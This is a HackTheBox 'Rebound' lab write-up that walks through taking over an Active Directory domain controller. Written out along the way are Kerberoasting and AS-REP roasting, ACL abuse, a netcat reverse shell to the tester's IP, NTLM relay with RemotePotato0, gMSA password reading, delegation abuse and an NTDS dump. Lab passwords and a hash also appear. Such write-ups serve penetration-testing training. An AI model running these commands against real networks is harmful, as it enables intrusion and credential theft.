13 KiB
HackTheBox - Rebound
NMAP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-13 22:36:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Issuer: commonName=rebound-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-25T22:48:10
| Not valid after: 2024-08-24T22:48:10
| MD5: 6605cbaef659f555d80b7a18adfb6ce8
|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
|_ssl-date: 2023-09-13T22:38:03+00:00; +6h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-13T22:38:04+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Issuer: commonName=rebound-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-25T22:48:10
| Not valid after: 2024-08-24T22:48:10
| MD5: 6605cbaef659f555d80b7a18adfb6ce8
|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Issuer: commonName=rebound-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-25T22:48:10
| Not valid after: 2024-08-24T22:48:10
| MD5: 6605cbaef659f555d80b7a18adfb6ce8
|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
|_ssl-date: 2023-09-13T22:38:03+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Issuer: commonName=rebound-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-25T22:48:10
| Not valid after: 2024-08-24T22:48:10
| MD5: 6605cbaef659f555d80b7a18adfb6ce8
|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
|_ssl-date: 2023-09-13T22:38:04+00:00; +6h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
First of all adding the DNS entries as some of the things won't work when it tries to reach DC
Enumerating smb shares will null authentication, this shows us few shares, where Shared might be of some interest
Accessing the shared share shows that it's empty
Moving on to enumerating users, we can try using lookupsid.py to retrieve usernames, so first trying with null authentication
This didn't work however we can try with guest account to brute force the SIDs of the users
lookupsid.py guest@rebound.htb
We have few usernames here
ppaul
llune
fflock
Having the usernames, AS-REP roasting can be performed to see if any of these accounts have pre-authentication disabled, GetNPUsers from impacket can be used here which detects for AS-REP accounts
Here I got stuck for a while, not knowing what to do, check the options for lookupsid, we can specify the range for brute forcing SIDs, by default the value is 4000
lookupsid.py guest@rebound.htb 10000
This gives us some more user names
Now again checking for pre-auth disabled accounts
GetNPUsers.py rebound.htb/uwu -usersfile users.txt -dc-ip rebound.htb
jjones had no pre-authentication required so grabbing the hash
hashcat -a 0 -m 18200 jjones.txt /usr/share/wordlists/rockyou.txt --force
But this wasn't crackable with the rockyou wordlist
We can however obtain service ticket for a SPN, performing kerberoasting through an account having no pre-authentication required
Using this https://github.com/ShutdownRepo/impacket/tree/getuserspns-nopreauth version of impacket since it has the GetUsersSPNs with no-preauth implementation
Now using `GetUsersSPNS.py` with the jjones having no-preauthentication required we can perform ASREP-Kerberoast to retrieve the TGS hash of `ldap_monitor`
Using hashcat on this hash, it gets cracked with the `1GR8t@$$4u`
To verify if this password isn't being used on multiple accounts we can try password spraying with either use crackmapexec or kerbrute also synchronizing time zone with the DC
Enumerating the domain with python-bloodhound
python3 /opt/BloodHound.py/bloodhound.py -d 'rebound.htb' -u 'oorend' -p '1GR8t@$$4u' -c all -ns 10.10.11.231
From bloodhound, it didn't showed anything interesting paths from ldap_monitor or oorend
But we can see ServiceMGMT group has GenericAll on Service Users OU
Enumerating ACLs through powerview.py but it requires kerberos authentication so first we'll need to request TGT of oorend user
powerview --use-ldaps -k --no-pass --dc-ip 10.10.11.231 rebound.htb/oorend@dc01.rebound.htb
Enumerating the access controls on service mgmt group, oorend has Self rights on the object
This means that we can make oorend as the group member of service mgmt
Using powerview.py we can add the group member
Add-DomainGroupMember -Identity ServiceMGMT -Members oorend
Get-DomainGroup -Identity ServiceMGMT
Now we have GenericAll on Service Users OU and under this OU we have two domain users for which we can force change password
We are only interested in changing the password of winrm_svc user since we can get login into DC with this user, for this we need to grant control over to oorend
We again need to request the TGT of oorend after add him into ServiceMGMT group
Add-DomainObjectAcl -Rights 'ResetPassword' -TargetIdentity "Service Users" -PrincipalIdentity "oorend"
Logging in through rpcclient we can change winrm_svc's users password ( the changes get reverted back so we need to do this quickly )
The password for this user will also be reverted so we can instead request TGT and login through winrm
evil-winrm -i dc01.rebound.htb -r REBOUND.HTB
Now our next target is tbrady since he can read GSMApassword of Delegator machine account
Getting a shell through nc64.exe with RunasC.exe to get a shell with netonly authentication
\RunasCs.exe winrm_svc 'P@assword@123' -d rebound.htb 'C:\Users\winrm_svc\Documents\nc64.exe 10.10.14.142 2222 -e cmd.exe' -l 9
After having a shell, with `quser` we can find `tbrady` being logged on the DC
This is going to make possible for us to trigger an NTLM authentication of tbrady and capture the NTLMv2 challenge response through RemotePotato0
https://github.com/antonioCoco/RemotePotato0
We'll choose the second option which is Rpc capture (hash) server + potato trigger
.\RemotePotato0.exe -m 2 -r 10.10.14.142 -x 10.10.14.142 -p 9999 -s 1
On our machine we'll run socat and ntlmrealyx
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999 & sudo impacket-ntlmrelayx -t ldaps://10.10.11.231
Cracking this NTLMv2 challenge response, we'll get the password for tbrady
So now getting a shell as tbrady through RunasCS by redirecting stdin, stdout and stderr of the specified command to a remote host
RunasCs.exe tbrady 543BOMBOMBUNmanda cmd -r 10.10.14.142:2222
Transferring GMSAPasswordReader
GMSAPasswordReader.exe --AccountName delegator
This can also be retrieved through bloodyAD
bloodyAD.py -u tbrady -d rebound.htb -p 543BOMBOMBUNmanda --host 10.10.11.231 get object 'delegator$' --attr msDS-ManagedPassword
Using StandIn we can verify that delegator$ has constrained delegation set to http/dc01.rebound.htb with protocol transition set to false
To abuse this we need to first edit msDS-AllowedToActOnBehalfOfOtherIdentity attribute on delegator$ to add any domain user that we control and request a ticket for browser SPN to impersonate as DC01$ then with http SPN we can impersonate as any domain user we want unless it's not in protected group or not marked is sensitive and cannot be delegated (this is very new to me I don't think I may have explained it correctly) so here's the resource which can help in understanding better about this scenario https://www.thehacker.recipes/a-d/movement/kerberos/delegations/constrained
First requesting TGT of delegator$
With rbcd.py we can try reading the value of msDS-AllowedToActOnBehalfOfOtherIdentity
impacket-rbcd 'rebound.htb/delegator$' -k -no-pass -delegate-to 'delegator$' -action read -use-ldaps -dc-ip 10.10.11.231
We need to add ldap_monitor add in this property as this account has a SPN to dc01 ldapmonitor/dc01.rebound.htb
impacket-rbcd 'rebound.htb/delegator$' -k -no-pass -delegate-to 'delegator$' -action write -delegate-from ldap_monitor -use-ldaps -dc-ip 10.10.11.231
Requesting this account's TGT and then impersonating as DC01$, reason being we can't impersonate as administrator as it's not allowed to be delegated
getST.py -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass
Now impersonating as DC01$ with HTTP SPN with the ticket obtained from browser SPN
getST.py -spn "http/dc01.rebound.htb" -impersonate "administrator" -additional-ticket "dc01\$.ccache" rebound.htb/'delegator$' -hashes :'CD903918320095660FF2E12072F5551C'
Make sure now to have dc01.rebound.htb in hosts file
With secretsdump NTDS file can now be dumped
References
- https://www.thehacker.recipes/ad/movement/kerberos/kerberoast
e915faa15c- https://www.semperis.com/blog/new-attack-paths-as-requested-sts/
- https://github.com/aniqfakhrul/powerview.py.git
- https://www.thehacker.recipes/a-d/movement/dacl
- http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm
- http://www.pseale.com/pretend-youre-on-the-domain-with-runas-netonly
- https://github.com/antonioCoco/RemotePotato0
- https://github.com/rvazarkar/GMSAPasswordReader
- https://www.thehacker.recipes/a-d/movement/kerberos/delegations/constrained
- https://github.com/FuzzySecurity/StandIn